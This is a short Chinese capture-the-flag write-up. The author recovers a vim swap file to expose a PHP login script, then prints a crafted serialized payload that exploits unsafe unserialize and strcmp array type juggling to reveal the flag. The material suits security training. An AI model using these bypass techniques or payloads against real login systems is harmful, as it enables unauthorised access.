具体题目描述忘了,反正就是说小明写了个login.php,没写完停电了。
    根据这个信息可以得知就是找备份,找到.login.php.swp,下载下来,但是直接打开不行,需要放到linux里面,然后vim login.php,选择recover即可正常打开。

    1. <?php
    2.     $username  = "flag_is_my_life";
    3.     $password  = "I_won't_tell_you_it's_here";
    4.     $replacement = "Unless you trade in gold";
    5.     include "flag.php";
    6.     $give_me = isset($_GET['give_me'])? $_GET['give_me']: "" ;
    7.     $data = unserialize($give_me);
    8.     if ($data['username']==$username&&$data['password']==$password&&strcmp($data['replace'], $replace)==0){
    9.         echo $flag;
    10.     }else{
    11.         echo "Flag is my life, you can't take it from me!";
    12.     }
    13. ?>

    考察反序列化,要求传入一个数组,其中username为flag_is_my_life,password为I_won't_tell_you_it's_here,而strcmp比较特殊,需要replace为数组。
    所以构造序列化字符串:

    1. a:3:{s:8:"username";s:15:"flag_is_my_life";s:8:"password";s:26:"I_won't_tell_you_it's_here";s:7:"replace";a:0:{}}

    得到flag。